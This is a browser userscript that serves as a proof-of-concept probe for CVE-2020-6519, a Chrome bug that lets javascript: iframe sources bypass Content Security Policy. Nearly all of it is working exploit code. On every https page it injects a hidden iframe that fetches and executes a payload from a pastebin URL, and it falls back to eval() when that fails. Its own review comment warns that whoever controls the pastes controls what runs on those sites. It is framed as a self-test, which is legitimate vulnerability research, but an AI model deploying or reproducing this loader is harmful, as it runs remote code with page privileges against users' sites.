// ==UserScript==
// @name EXPLOIT-CVE-2020-6519
// @namespace http://tampermonkey.net/
// @version 0.1
// @description Probes whether this Chrome build (CVE-2020-6519: javascript: iframe src bypasses CSP, Chrome 73-83) and this site's CSP let a third-party script run; fetches and executes test payloads from pastebin.com on every matched page
// @author Gal Weizman ([email protected])
// @match https://*/*
// @grant none
// ==/UserScript==
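/**
 * CVE-2020-6519 (Chrome CSP bypass via `javascript:` iframe URLs) self-test.
 *
 * Executes in page context and reports, in a sticky banner prepended to <body>
 * and on the console, which of these lets a script run on the current page:
 *   1. the page's CSP already allows an external script from pastebin.com
 *      (script-src too loose) - the CVE is then irrelevant for this page;
 *   2. otherwise a hidden iframe with a `javascript:` src is injected, which an
 *      unpatched Chrome (major 73..83) executes despite CSP - the CVE itself;
 *   3. if the `javascript:` URL did not run, the same payload is eval()ed inside
 *      the iframe as a fallback probe (only works when the inherited CSP
 *      permits 'unsafe-eval').
 *
 * @param {boolean} [fail=false] true when the caller could not inject this
 *   function as an inline <script> (the page's CSP blocked it). Only the
 *   "blocked by CSP" banner is rendered and nothing is fetched.
 *
 * NOTE(review): both payloads are fetched from third-party-hosted pastes and
 * executed with the page's privileges; whoever controls those pastes controls
 * what runs on every https:// site this userscript is enabled for. Self-host
 * the payloads and/or narrow @match before running this outside a throwaway
 * browser profile. This function is re-parsed from its source text by the
 * injector, so it must stay self-contained (no closure over userscript scope).
 */
const cve_entire_func = function (fail = false) {
  // Signals to the injecting userscript that the inline copy actually ran.
  top._CVE_START = true;

  // Shared by the helpers below: `div` is the visible banner, `div2` the hidden
  // container for the probe iframe, `isVulnerable` memoises the UA check.
  let div;
  let div2;
  let isVulnerable;

  // Appends one line to the banner and mirrors it on the console.
  function message(...args) {
    console.log('CVE-2020-6519-exploit: ', ...args);
    const line = document.createElement('li');
    line.innerText = args.join(' ');
    div.appendChild(line);
  }

  // Stage 2/3: probe the CVE itself with a hidden `javascript:` iframe.
  function exploit() {
    message('start running exploit');
    // Exposed on `top` because the payload runs in the iframe, not here.
    top._MESSAGE = message;
    top._CVE_URL = 'https://pastebin.com/raw/XpHsfXJQ';
    // onload/onerror of the <script> the payload injects; both repaint the banner.
    top._xxx = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}"; top._MESSAGE("script was successfully fetched from https://pastebin.com/raw/XpHsfXJQ even though Content Security Policy does not allow it! π₯ππ»π"); };
    top._yyy = () => { top.CVE_STYLE.textContent += "div.sticky {background-color: yellow;}"; top._MESSAGE("script failed to be fetched from https://pastebin.com/raw/XpHsfXJQ thanks to this Chrome being patched for CVE-2020-6519! π₯³ππ»π (but this website's CSP is still not well configured though...)"); };
    // Source executed inside the iframe; `top.SUCCESS` records that the
    // javascript: URL ran at all. Kept verbatim - it is the probe's behaviour.
    const payload = `
top.SUCCESS = true;
var s = document.createElement("script");
s.src = top._CVE_URL;
s.onload = top._xxx;
s.onerror = top._yyy;
document.body.appendChild(s);
`;
    // Deliberately innerHTML: the javascript: src IS the vector under test and
    // the markup is a constant, not page-controlled input.
    div2.innerHTML +=
      "<iframe id='_XXX' style='display:none' src='javascript:" +
      payload +
      "'></iframe>";
    // Fallback once the iframe exists: if the javascript: URL was blocked
    // (patched Chrome, CSP honoured), push the same payload through eval() in
    // the iframe. Intentional eval on a constant; it is the probe, not a leak.
    setTimeout(() => {
      if (!top.SUCCESS) {
        // Explicit lookup instead of the implicit window['_XXX'] named-element
        // global, which any page script could shadow.
        const frame = document.getElementById('_XXX');
        frame.contentWindow.eval(payload);
      }
    });
    setTimeout(() => {
      message(
        'in case exploitation succeeded - an alert message originated by the forbidden script should pop up'
      );
      message('finish testing exploitability');
    }, 500);
  }

  // Installs the banner stylesheet; `color` is the banner background.
  function css(color = 'greenyellow') {
    const content = `div.sticky {position: -webkit-sticky;position: sticky;top: 0;padding: 50px;background-color: ${color};font-size: 20px;}`;
    const style = document.createElement('style');
    style.id = 'CVE_STYLE';
    style.textContent = content;
    document.head.appendChild(style);
  }

  // Mounts the banner and the hidden container, then runs the CVE probe.
  function start() {
    message('start testing exploitability');
    document.body.prepend(div);
    document.body.prepend(div2);
    css();
    exploit();
  }

  // Parses the Chrome major version out of the UA string. CVE-2020-6519 is
  // reported for majors 73..83 (fixed in 84). Returns undefined when no
  // "Chrome/" token is present; the probe still runs in that case.
  function getIsVulnerable() {
    if (isVulnerable !== undefined) return isVulnerable;
    const ua = navigator.userAgent;
    message('User Agent: ', ua);
    for (const part of ua.split(' ')) {
      if (!part.startsWith('Chrome')) continue;
      const version = part.replace('Chrome/', '').split('.')[0];
      const major = Number.parseInt(version, 10);
      isVulnerable = major < 84 && major > 72;
      message(
        'Chrome',
        isVulnerable ? 'is' : 'is not',
        'vulnerable to CVE-2020-6519',
        isVulnerable ? 'π₯' : 'π',
        '(version',
        version,
        'major)'
      );
      break;
    }
    return isVulnerable;
  }

  // Builds the DOM, reports the UA verdict, then runs stage 1 (external
  // script allowed by CSP?) unless the caller already knows injection failed.
  function init() {
    div2 = document.createElement('div');
    div2.id = 'b';
    div2.style.display = 'none';
    div = document.createElement('div');
    div.id = 'a';
    div.setAttribute('class', 'sticky');
    const label = document.createElement('b');
    label.innerText = 'CVE-2020-6519-exploit: ';
    div.appendChild(label);
    isVulnerable = getIsVulnerable();
    if (fail) {
      // Inline <script> injection was blocked, so nothing else can be probed
      // from page context; just report that CSP held.
      document.body.prepend(div);
      document.body.prepend(div2);
      css();
      message(
        'script failed to load from https://pastebin.com/raw/XpHsfXJQ thanks to this website\'s Content Security Policy not allowing unsafe execution of scripts! ππ»πππ»πππ»'
      );
      return;
    }
    // Stage 1: if this third-party script loads, script-src already permits
    // pastebin.com and the browser bug is irrelevant; skip the CVE probe.
    const s = document.createElement('script');
    s.src = 'https://pastebin.com/raw/95f4NkAL';
    s.onload = () => {
      document.body.prepend(div);
      document.body.prepend(div2);
      css('red');
      message(
        'this website is vulnerable due to poorley configured Content Security Policy'
      );
      message(
        'therefore, there is no reason to even check whether CVE-2020-6519 is exploitable or not - loading unwanted scripts can be done without it πππ'
      );
    };
    // Blocked by CSP (or unreachable) - the page itself is fine, test the CVE.
    s.onerror = () => {
      start();
    };
    document.head.appendChild(s);
  }

  init();
};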
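/**
 * Userscript entry point. Injects `cve_entire_func` into the page as an inline
 * <script> (stage 0: does the page's CSP permit inline scripts at all?). If the
 * inline copy has not set `top._CVE_START` within 1.5 s the injection was
 * blocked, and the function is run directly with `fail = true` so the banner
 * still reports the outcome.
 *
 * Only the top-level document runs the probe: sub-frames share `top`, so a
 * same-origin frame would race the top document on `_CVE_START` and report a
 * wrong verdict, and a cross-origin frame would throw on the `top._CVE_START`
 * write. (`// @noframes` in the header is the metadata-level equivalent.)
 */
function check() {
  if (window !== window.top) return;
  const s = document.createElement('script');
  // Serialises the function's source text; it then executes in page context
  // rather than the userscript sandbox, which is what the CSP check needs.
  s.textContent = '(' + cve_entire_func + '())';
  top._CVE_START = false;
  setTimeout(() => {
    if (!top._CVE_START) cve_entire_func(true);
  }, 1500);
  document.head.appendChild(s);
}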
// Kick off the probe as soon as the userscript is injected.
(() => {
  check();
})();